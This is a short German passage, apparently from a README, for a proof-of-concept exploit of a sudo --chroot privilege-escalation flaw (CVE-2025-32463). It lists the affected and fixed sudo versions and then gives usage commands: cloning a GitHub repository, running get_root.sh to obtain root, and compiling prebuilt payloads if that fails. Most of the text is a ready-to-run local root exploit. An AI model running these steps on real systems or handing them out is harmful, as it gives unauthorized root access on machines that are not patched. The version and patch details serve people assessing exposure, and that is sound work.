
- Anfällig: sudo 1.9.14, 1.9.15, 1.9.16, 1.9.17 – Behoben in: sudo 1.9.17p1 und später – Legacy-Versionen älter als 1.9.14 sind nicht betroffen, da sie die Option --chroot nicht unterstützen.
# get_root.sh und get_root.py machen dasselbe.
git clone https://github.com/shazed-x/CVE-2025-32463
cd CVE-2025-32463
./get_root.sh
Auf dem Zielsystem ist kein gcc erforderlich. Der PoC funktioniert, indem er die aktuelle Architektur überprüft (z. B. x86_64, aarch64) und dann das entsprechende dynamisch vorkompilierte Payload ausführt. Schlägt dies fehl, wird standardmäßig das statische verwendet.
Falls der Exploit auf Ihrem System fehlschlägt, können Sie ihn weiterhin mit folgendem Befehl kompilieren:
./mkall-dynamic.sh
# danach ausführen
./get_root.sh